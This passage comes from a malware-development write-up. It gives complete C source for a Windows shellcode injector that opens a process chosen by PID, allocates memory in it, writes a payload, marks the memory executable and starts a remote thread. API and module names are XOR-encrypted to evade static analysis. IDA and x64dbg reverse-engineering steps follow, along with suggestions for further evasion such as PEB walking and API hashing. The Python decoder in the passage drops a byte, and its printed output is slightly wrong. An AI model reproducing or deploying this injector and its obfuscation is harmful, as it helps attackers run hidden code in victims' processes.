    xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

We can repeat the process to result in all the strings for the APIs/Module names listed above being encrypted and thus hidden from the IAT, strings list, and would be slightly harder overall to do static analysis (will be shown below in the next section). Here is the finalized code with all the Module/API strings XOR encrypted:

#include <stdio.h>
#include <string.h>
#include <windows.h>
#include <TlHelp32.h>
#include "payload.h"

//
// XOR Decryption Function
//
void xor_decrypt( unsigned char *data, int data_len )
{
    unsigned char key = 0x57;

	for( int i = 0; i < data_len; i++ )
	{
		data[i] ^= key;
	}
}

int main( int argc, char* argv[] )
{
    if( argc < 2 )
    {
        return 1;
    }

    HANDLE process_snapshot;
    HANDLE target_process = NULL;
    PROCESSENTRY32 current_process;
    DWORD process_id = atoi( argv[1] );

    //
    // ENUMERATE RUNNING PROCESSES TO ENSURE PID IS VALID
    //
    unsigned char kernel32_dll_encrypted[] = { 0x3c, 0x32, 0x25, 0x39, 0x32, 0x3b, 0x64, 0x65, 0x79, 0x33, 0x3b, 0x3b, 0x57 };
    xor_decrypt( kernel32_dll_encrypted, sizeof(kernel32_dll_encrypted) );
    HMODULE kernel32_dll_handle = LoadLibraryA( kernel32_dll_encrypted );
    
    if( NULL == kernel32_dll_handle )
    {
        // printf( "Could not load kernel32.dll!\n" );
        return 1;
    }
    
    unsigned char CreateToolhelp32Snapshot_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x03, 0x38, 0x38, 0x3b, 0x3f, 0x32, 0x3b, 0x27, 0x64, 0x65, 0x04, 0x39, 0x36, 0x27, 0x24, 0x3f, 0x38, 0x23, 0x57 };
    xor_decrypt( CreateToolhelp32Snapshot_encrypted, sizeof(CreateToolhelp32Snapshot_encrypted) );

    HANDLE( WINAPI * _CreateToolhelp32Snapshot )
    (
        DWORD dwFlags,
        DWORD th32ProcessID        
    );

    _CreateToolhelp32Snapshot = (HANDLE (WINAPI *)
    (
        DWORD dwFlags,
        DWORD th32ProcessID     
    )) GetProcAddress( kernel32_dll_handle, CreateToolhelp32Snapshot_encrypted );

    if( NULL == _CreateToolhelp32Snapshot )
    {
        // printf( "Could not resolve CreateToolhelp32Snapshot!\n" );
        return 1;
    }

    process_snapshot = _CreateToolhelp32Snapshot( TH32CS_SNAPPROCESS, 0 );

    if( NULL == process_snapshot )
    {
        return 1;
    }

    current_process.dwSize = sizeof( PROCESSENTRY32 );
    
    unsigned char Process32First_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x11, 0x3e, 0x25, 0x24, 0x23, 0x57 };
    xor_decrypt( Process32First_encrypted, sizeof(Process32First_encrypted) );
    
    BOOL( WINAPI * _Process32First)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe   
    );

    _Process32First = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe     
    )) GetProcAddress( kernel32_dll_handle, Process32First_encrypted );

    if( NULL == _Process32First )
    {
        // printf( "Could not resolve Process32First!\n" );
        return 1;
    }
    
    _Process32First( process_snapshot, &current_process );

    BOOL( WINAPI * _Process32Next)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe 
    );

    unsigned char Process32Next_encrypted[] = { 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x64, 0x65, 0x19, 0x32, 0x2f, 0x23, 0x57 };
    xor_decrypt( Process32Next_encrypted, sizeof(Process32Next_encrypted) );

    _Process32Next = ( BOOL (WINAPI *)
    (
        HANDLE           hSnapshot,
        LPPROCESSENTRY32 lppe    
    )) GetProcAddress( kernel32_dll_handle, Process32Next_encrypted );

    if( NULL == _Process32Next )
    {
        // printf( "Could not resolve Process32Next!\n" );
        return 1;
    }

    do
    {   
        // printf( "process id = %d\n", current_process.th32ProcessID );
        if( process_id == current_process.th32ProcessID )
        {
            unsigned char OpenProcess_encrypted[] = { 0x18, 0x27, 0x32, 0x39, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x57 };
            xor_decrypt( OpenProcess_encrypted, sizeof(OpenProcess_encrypted) );

            HANDLE( WINAPI * _OpenProcess )
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId            
            );

            _OpenProcess = ( HANDLE (WINAPI *)
            (
                DWORD dwDesiredAccess,
                BOOL  bInheritHandle,
                DWORD dwProcessId             
            )) GetProcAddress( kernel32_dll_handle, OpenProcess_encrypted );

            if( NULL == _OpenProcess )
            {
                // printf( "Could not resolve OpenProcess!\n" );
                return 1;
            }

            target_process = _OpenProcess( PROCESS_ALL_ACCESS, TRUE, current_process.th32ProcessID );
            break;
        }
    }

    while( _Process32Next(process_snapshot, &current_process) );

    CloseHandle( process_snapshot );

    if( NULL == target_process )
    {
        return 1;
    }

    //
    // ALLOCATE MEMORY IN TARGET PROCESS
    //
    size_t payload_size = sizeof( payload );
    LPVOID target_process_allocated_memory = NULL;
    
    unsigned char VirtualAllocEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x16, 0x3b, 0x3b, 0x38, 0x34, 0x12, 0x2f, 0x57 };
    xor_decrypt( VirtualAllocEx_encrypted, sizeof(VirtualAllocEx_encrypted) );

    LPVOID( WINAPI * _VirtualAllocEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    );

    _VirtualAllocEx = ( LPVOID( WINAPI *) 
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flAllocationType,
        DWORD  flProtect    
    )) GetProcAddress( kernel32_dll_handle, VirtualAllocEx_encrypted );

    if( NULL == _VirtualAllocEx )
    {
        // printf( "Could not resolve VirtualAllocEx!\n" );
        return 1;
    }

    target_process_allocated_memory = _VirtualAllocEx( target_process, NULL, payload_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE );

    if( NULL == target_process_allocated_memory )
    {
        // printf( "[!] Could not allocate memory!\n" );
        return 1;
    }

    // printf( "[+] Successfully allocated memory!\n" );

    //
    // WRITE TO ALLOCATED MEMORY
    //
    BOOL return_check = FALSE;

    unsigned char WriteProcessMemory_encrypted[] = { 0x00, 0x25, 0x3e, 0x23, 0x32, 0x07, 0x25, 0x38, 0x34, 0x32, 0x24, 0x24, 0x1a, 0x32, 0x3a, 0x38, 0x25, 0x2e, 0x57 };
    xor_decrypt( WriteProcessMemory_encrypted, sizeof(WriteProcessMemory_encrypted) );

    BOOL( WINAPI * _WriteProcessMemory )
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten    
    );

    _WriteProcessMemory = ( BOOL(WINAPI *)
    (
        HANDLE  hProcess,
        LPVOID  lpBaseAddress,
        LPCVOID lpBuffer,
        SIZE_T  nSize,
        SIZE_T  *lpNumberOfBytesWritten     
    )) GetProcAddress( kernel32_dll_handle, WriteProcessMemory_encrypted );

    if( NULL == _WriteProcessMemory )
    {
        // printf( "Could not resolve WriteProcessMemory!\n" );
        return 1;
    }

    return_check = _WriteProcessMemory( target_process, target_process_allocated_memory, payload, payload_size, NULL );

    if( FALSE == return_check )
    {
        // printf( "[+] WriteProcessMemory returned false!\n" );
        return 1;
    }

    //
    // UPDATE PERMISSIONS TO ALLOW EXECUTION
    //
    DWORD old_protect = NULL;

    unsigned char VirtualProtectEx_encrypted[] = { 0x01, 0x3e, 0x25, 0x23, 0x22, 0x36, 0x3b, 0x07, 0x25, 0x38, 0x23, 0x32, 0x34, 0x23, 0x12, 0x2f, 0x57 };
    xor_decrypt( VirtualProtectEx_encrypted, sizeof(VirtualProtectEx_encrypted) ); 

    BOOL( WINAPI * _VirtualProtectEx )
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect
    );

    _VirtualProtectEx = ( BOOL(WINAPI *)
    (
        HANDLE hProcess,
        LPVOID lpAddress,
        SIZE_T dwSize,
        DWORD  flNewProtect,
        PDWORD lpflOldProtect   
    )) GetProcAddress( kernel32_dll_handle, VirtualProtectEx_encrypted );

    if( NULL == _VirtualProtectEx )
    {
        // printf( "Could not resolve VirtualProtectEx!\n" );
        return 0;
    }

    return_check = _VirtualProtectEx( target_process, target_process_allocated_memory, payload_size, PAGE_EXECUTE_READWRITE, &old_protect );

    if( FALSE == return_check )
    {
        // printf( "[!] VirtualProtectEx() returned false! Error code: %d\n", GetLastError() );
        return 1;
    }

    //
    // EXECUTED SHELLCODE IN ALLOCATED MEMORY
    //
    HANDLE handle_remote_thread = NULL;

    unsigned char CreateRemoteThread_encrypted[] = { 0x14, 0x25, 0x32, 0x36, 0x23, 0x32, 0x05, 0x32, 0x3a, 0x38, 0x23, 0x32, 0x03, 0x3f, 0x25, 0x32, 0x36, 0x33, 0x57 };
    xor_decrypt( CreateRemoteThread_encrypted, sizeof(CreateRemoteThread_encrypted) );

    HANDLE( WINAPI * _CreateRemoteThread )
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId   
    );

    _CreateRemoteThread = ( HANDLE(WINAPI *)
    (
        HANDLE                 hProcess,
        LPSECURITY_ATTRIBUTES  lpThreadAttributes,
        SIZE_T                 dwStackSize,
        LPTHREAD_START_ROUTINE lpStartAddress,
        LPVOID                 lpParameter,
        DWORD                  dwCreationFlags,
        LPDWORD                lpThreadId    
    )) GetProcAddress( kernel32_dll_handle, CreateRemoteThread_encrypted );

    if( NULL == _CreateRemoteThread )
    {
        // printf( "Could not resolve CreateRemoteThread!\n" );
        return 1;
    }

    handle_remote_thread = _CreateRemoteThread( target_process, NULL, 0, target_process_allocated_memory, NULL, 0, NULL );

    if( NULL == handle_remote_thread )
    {
        // printf( "[!] CreateRemoteThread() failed!\n" );
        return 1;
    }    

    return 0;
}

Static Analysis of encrypted-apis.exe

To start off, looking at the IAT and the strings table within IDA doesn’t really give us any solid indication of what’s going on with the program. Two interesting APIs that are in the IAT that show up are LoadLibraryA and GetProcAddress, however from the strings table we cannot see how these are being used right away. Shown below is the pseudocode that IDA generated.

int __fastcall main(int argc, const char **argv, const char **envp)
{
  HMODULE hModule; // [rsp+48h] [rbp-270h]
  __int64 v5; // [rsp+50h] [rbp-268h]
  __int64 v6; // [rsp+58h] [rbp-260h]
  HANDLE hObject; // [rsp+60h] [rbp-258h]
  int v8; // [rsp+68h] [rbp-250h]
  int v9; // [rsp+6Ch] [rbp-24Ch] BYREF
  __int64 v10; // [rsp+70h] [rbp-248h]
  FARPROC ProcAddress; // [rsp+78h] [rbp-240h]
  FARPROC v12; // [rsp+80h] [rbp-238h]
  FARPROC v13; // [rsp+88h] [rbp-230h]
  FARPROC v14; // [rsp+90h] [rbp-228h]
  FARPROC v15; // [rsp+98h] [rbp-220h]
  FARPROC v16; // [rsp+A0h] [rbp-218h]
  FARPROC v17; // [rsp+A8h] [rbp-210h]
  FARPROC v18; // [rsp+B0h] [rbp-208h]
  __int64 v19; // [rsp+B8h] [rbp-200h]
  int v20; // [rsp+C0h] [rbp-1F8h] BYREF
  unsigned int v21; // [rsp+C8h] [rbp-1F0h]
  CHAR v22; // [rsp+1F0h] [rbp-C8h] BYREF
  char v23[11]; // [rsp+1F1h] [rbp-C7h] BYREF
  CHAR LibFileName[16]; // [rsp+200h] [rbp-B8h] BYREF
  CHAR v25[10]; // [rsp+210h] [rbp-A8h] BYREF
  char v26[4]; // [rsp+21Ah] [rbp-9Eh] BYREF
  CHAR v27[10]; // [rsp+220h] [rbp-98h] BYREF
  char v28[5]; // [rsp+22Ah] [rbp-8Eh] BYREF
  CHAR v29[13]; // [rsp+230h] [rbp-88h] BYREF
  char v30[2]; // [rsp+23Dh] [rbp-7Bh] BYREF
  CHAR v31[15]; // [rsp+240h] [rbp-78h] BYREF
  char v32[2]; // [rsp+24Fh] [rbp-69h] BYREF
  CHAR v33[13]; // [rsp+258h] [rbp-60h] BYREF
  char v34[6]; // [rsp+265h] [rbp-53h] BYREF
  CHAR v35[13]; // [rsp+270h] [rbp-48h] BYREF
  char v36[6]; // [rsp+27Dh] [rbp-3Bh] BYREF
  CHAR ProcName[17]; // [rsp+288h] [rbp-30h] BYREF
  char v38[8]; // [rsp+299h] [rbp-1Fh] BYREF

  if ( argc < 2 )
    return 1;
  v5 = 0LL;
  v8 = unknown_libname_19(argv[1], argv, envp);
  qmemcpy(LibFileName, "<2%92;dey3;;W", 13);
  sub_140001000((__int64)LibFileName, 0xDu);
  hModule = LoadLibraryA(LibFileName);
  if ( !hModule )
    return 1;
  ProcName[0] = 20;
  ProcName[1] = 37;
  ProcName[2] = 50;
  ProcName[3] = 54;
  ProcName[4] = 35;
  ProcName[5] = 50;
  ProcName[6] = 3;
  ProcName[7] = 56;
  ProcName[8] = 56;
  ProcName[9] = 59;
  ProcName[10] = 63;
  ProcName[11] = 50;
  ProcName[12] = 59;
  ProcName[13] = 39;
  ProcName[14] = 100;
  ProcName[15] = 101;
  ProcName[16] = 4;
  qmemcpy(v38, "96'$?8#W", sizeof(v38));
  sub_140001000((__int64)ProcName, 0x19u);
  ProcAddress = GetProcAddress(hModule, ProcName);
  if ( !ProcAddress )
    return 1;
  hObject = (HANDLE)((__int64 (__fastcall *)(__int64, _QWORD))ProcAddress)(2LL, 0LL);
  if ( !hObject )
    return 1;
  v20 = 304;
  v27[0] = 7;
  v27[1] = 37;
  v27[2] = 56;
  v27[3] = 52;
  v27[4] = 50;
  v27[5] = 36;
  v27[6] = 36;
  v27[7] = 100;
  v27[8] = 101;
  v27[9] = 17;
  qmemcpy(v28, ">%$#W", sizeof(v28));
  sub_140001000((__int64)v27, 15u);
  v12 = GetProcAddress(hModule, v27);
  if ( !v12 )
    return 1;
  ((void (__fastcall *)(HANDLE, int *))v12)(hObject, &v20);
  v25[0] = 7;
  v25[1] = 37;
  v25[2] = 56;
  v25[3] = 52;
  v25[4] = 50;
  v25[5] = 36;
  v25[6] = 36;
  v25[7] = 100;
  v25[8] = 101;
  v25[9] = 25;
  qmemcpy(v26, "2/#W", sizeof(v26));
  sub_140001000((__int64)v25, 0xEu);
  v14 = GetProcAddress(hModule, v25);
  if ( !v14 )
    return 1;
  while ( v8 != v21 )
  {
    if ( !((unsigned int (__fastcall *)(HANDLE, int *))v14)(hObject, &v20) )
      goto LABEL_18;
  }
  v22 = 24;
  qmemcpy(v23, "'29\a%842$$W", sizeof(v23));
  sub_140001000((__int64)&v22, 0xCu);
  v13 = GetProcAddress(hModule, &v22);
  if ( !v13 )
    return 1;
  v5 = ((__int64 (__fastcall *)(__int64, __int64, _QWORD))v13)(0x1FFFFFLL, 1LL, v21);
LABEL_18:
  CloseHandle(hObject);
  if ( !v5 )
    return 1;
  v10 = 3072LL;
  v29[0] = 1;
  v29[1] = 62;
  v29[2] = 37;
  v29[3] = 35;
  v29[4] = 34;
  v29[5] = 54;
  v29[6] = 59;
  v29[7] = 22;
  v29[8] = 59;
  v29[9] = 59;
  v29[10] = 56;
  v29[11] = 52;
  v29[12] = 18;
  qmemcpy(v30, "/W", sizeof(v30));
  sub_140001000((__int64)v29, 0xFu);
  v15 = GetProcAddress(hModule, v29);
  if ( !v15 )
    return 1;
  v6 = ((__int64 (__fastcall *)(__int64, _QWORD, __int64, __int64, int))v15)(v5, 0LL, v10, 12288LL, 4);
  if ( !v6 )
    return 1;
  v33[0] = 0;
  v33[1] = 37;
  v33[2] = 62;
  v33[3] = 35;
  v33[4] = 50;
  v33[5] = 7;
  v33[6] = 37;
  v33[7] = 56;
  v33[8] = 52;
  v33[9] = 50;
  v33[10] = 36;
  v33[11] = 36;
  v33[12] = 26;
  qmemcpy(v34, "2:8%.W", sizeof(v34));
  sub_140001000((__int64)v33, 0x13u);
  v16 = GetProcAddress(hModule, v33);
  if ( !v16 )
    return 1;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, void *, __int64, _QWORD))v16)(v5, v6, &unk_14001C000, v10, 0LL) )
    return 1;
  v9 = 0;
  v31[0] = 1;
  v31[1] = 62;
  v31[2] = 37;
  v31[3] = 35;
  v31[4] = 34;
  v31[5] = 54;
  v31[6] = 59;
  v31[7] = 7;
  v31[8] = 37;
  v31[9] = 56;
  v31[10] = 35;
  v31[11] = 50;
  v31[12] = 52;
  v31[13] = 35;
  v31[14] = 18;
  qmemcpy(v32, "/W", sizeof(v32));
  sub_140001000((__int64)v31, 0x11u);
  v17 = GetProcAddress(hModule, v31);
  if ( !v17 )
    return 0;
  if ( !((unsigned int (__fastcall *)(__int64, __int64, __int64, __int64, int *))v17)(v5, v6, v10, 64LL, &v9) )
    return 1;
  v19 = 0LL;
  v35[0] = 20;
  v35[1] = 37;
  v35[2] = 50;
  v35[3] = 54;
  v35[4] = 35;
  v35[5] = 50;
  v35[6] = 5;
  v35[7] = 50;
  v35[8] = 58;
  v35[9] = 56;
  v35[10] = 35;
  v35[11] = 50;
  v35[12] = 3;
  qmemcpy(v36, "?%263W", sizeof(v36));
  sub_140001000((__int64)v35, 0x13u);
  v18 = GetProcAddress(hModule, v35);
  if ( !v18 )
    return 1;
  v19 = ((__int64 (__fastcall *)(__int64, _QWORD, _QWORD, __int64, _QWORD, _DWORD, _QWORD))v18)(
          v5,
          0LL,
          0LL,
          v6,
          0LL,
          0,
          0LL);
  return v19 == 0;
}

In the pseudocode that’s been generated, we can see a general pattern of

  1. Program defines some sort of string
  2. sub_140001000 is called with the defined string and an integer as the arguments
  3. GetProcAddress is called with the same argument from when sub_140001000 is called. The address returned is saved onto a variable
  4. The variable from the third step is casted as a function type with some sort of function signature

Looking into what sub_140001000 does:

__int64 __fastcall sub_140001000(__int64 a1, unsigned int a2)
{
  __int64 result; // rax
  int i; // [rsp+4h] [rbp-14h]

  for ( i = 0; ; ++i )
  {
    result = a2;
    if ( i >= (int)a2 )
      break;
    *(_BYTE *)(a1 + i) ^= 0x57u;
  }
  return result;
}

So first, instead of the function saying it’s getting a string (the address to the string) passed into it, it says a 64 bit integer. To change the function signature we can Set item type (change the arguments/function signature) for it to get passed in a char * - a string. Doing so results in the pseudocode being updated like so:

__int64 __fastcall sub_140001000(char *a1, unsigned int a2)
{
  __int64 result; // rax
  signed int i; // [rsp+4h] [rbp-14h]

  for ( i = 0; ; ++i )
  {
    result = a2;
    if ( i >= (int)a2 )
      break;
    a1[i] ^= 0x57u;
  }
  return result;
}

From this, we can see that the for loop increments by one until a2 (which we assume is the length) is reached. Until then, it goes through all the characters of the string and XOR’s it by 0x57. To attempt to decrypt one of the strings, I used ProcName from the pseudocode and converted it first to hexadecimal:

  ProcName[0] = 0x14;
  ProcName[1] = 0x25;
  ProcName[2] = 0x32;
  ProcName[3] = 0x36;
  ProcName[4] = 0x23;
  ProcName[5] = 0x32;
  ProcName[6] = 3;
  ProcName[7] = 0x38;
  ProcName[8] = 0x38;
  ProcName[9] = 0x3B;
  ProcName[10] = 0x3F;
  ProcName[11] = 0x32;
  ProcName[12] = 0x3B;
  ProcName[13] = 0x27;
  ProcName[14] = 0x64;
  ProcName[15] = 0x65;
  ProcName[16] = 4;
  qmemcpy(v38, "96'$?8#W", sizeof(v38));
  sub_140001000(ProcName, 25u);
  ProcAddress = GetProcAddress(hModule, ProcName);

Looking at the decompilation view in IDA, we can see more hex values being allocated into the string:

image.png

I wrote a python3 program string-dec.py to XOR bytes with the key, convert to string, and print the resulting string. Here is the program and the output:

# define byte string
enc_string = b'\x14\x25\x32\x36\x23\x32\x03\x38\x38\x3b\x3f\x32\x3b\x27\x64\x04\x39\x36\x27\x24\x3f\x38\x23\x57'

xor_key = b'\x57' 

plaintext = []

for byte in enc_string:
    xor_byte = byte ^ xor_key[0]
    plaintext.append( xor_byte )

byte_string = bytes( plaintext )

resulting_string = byte_string.decode('utf-8')

print( resulting_string )
> python3 string-dec.py

CreateToolhelp3Snapshot

This shows that the API name that’s been encrypted is the CreateToolhelp32Snapshot. Following the same procedure shows all the API calls being resolved using GetProcAddress.

To look into an alternate way via dynamic analysis, I also looked into doing some analysis using x64 debugger. To do this, first load the program into the debugger, ensure you add the argument for the PID (under File > Change Command Line , then add the PID after the parenthesis of the program path (i.e. "C:\Malware Dev\api-obfuscation\encrypted-apis.exe" 4188). Then, I set a breakpoint for every time GetProcAddress is called. To do this go to the Symbols tab, click on kernel32.dll, then look for GetProcAddress, right click and click Toggle Breakpoint. Then on the top you can run the program and it’ll stop every time the API is called. After investigating through some of the GetProcAddress calls, it gets to the point where we see the name of the API being called in the RDX register. An example is shown below where it shows CreateToolhelp32Snapshot being loaded:

image.png

You can see the instruction pointer RIP is set right before GetProcAddress is called with CreateToolhelp32Snapshot being part of the arguments on the stack. On the top we can click the forward arrow to continue executing and the debugger will continue to stop with each GetProcAddress call, and we’re able to see the name of the API being resolved in the RDX register. By doing this, we can see the rest of API names being resolved in plaintext and therefore can conclude what the program is doing.

Conclusion, Further Possibilities and Considerations

This writeup went over the process of developing a simple malware program for shellcode injection and applying various obfuscation techniques to evade static analysis. Through the use of API obfuscation and string encryption, we demonstrated how these techniques can hinder reverse engineering efforts, making it more challenging (but not impossible!) to analyze the program using standard tools like IDA.

For further studies, one could consider that two interesting APIs are still on the IAT - GetProcAddress and LoadLibraryA. There are ways to calculate and obtain the absolute address of both these APIs by traversing the PEB which is outlined in my previous shellcoding in C writeup. One could do this to find the address of those two API addresses to resolve them, and then use them to completely hide all the APIs from the IAT. In addition, further obfuscation techniques like malware hashing could be leveraged to make it more difficult for malware analysts to understand what APIs or strings are being used throughout this program. API hashing was previously planned for this writeup but will likely be it’s own writeup due to time constraints.

On the reversing side of things, being more thorough with the dynamic analysis could have been done to see the decryption in memory being taken place instead of relying on setting breakpoints on a specific API (what if it’s resolved and thus is never formally “called”?). Rebasing the addresses with what’s in IDA could’ve also been done to follow program execution flow better.